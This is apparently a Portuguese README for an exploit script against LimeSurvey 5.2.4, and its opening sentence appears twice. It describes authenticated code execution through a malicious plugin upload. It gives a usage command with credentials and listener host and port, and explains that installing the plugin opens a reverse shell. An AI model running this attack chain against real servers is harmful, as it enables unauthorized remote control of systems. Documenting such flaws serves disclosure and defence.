
Execução remota de comandos autenticada (privilegiada) no LimeSurvey Versão 5.2.4 através do upload e instalação de plugins permite que um usuário remoto faça upload de um arquivo de código PHP arbitrário.
Execução remota de comandos autenticada (privilegiada) no LimeSurvey Versão 5.2.4 através do upload e instalação de plugins permite que um usuário remoto faça upload de arquivo de código PHP arbitrário.
python3 exploit.py --url <http://example.com> --user <userName> --password <userPassword> --lhost <localHost> --lport <localPort>
Um usuário superadmin tem permissão para carregar módulos de plugin através do painel de administração do LimeSurvey. O script cria localmente os arquivos, compacta e faz upload deles. Posteriormente, é feita uma chamada para instalar, ativar e executar os módulos, executando o reverse shell.
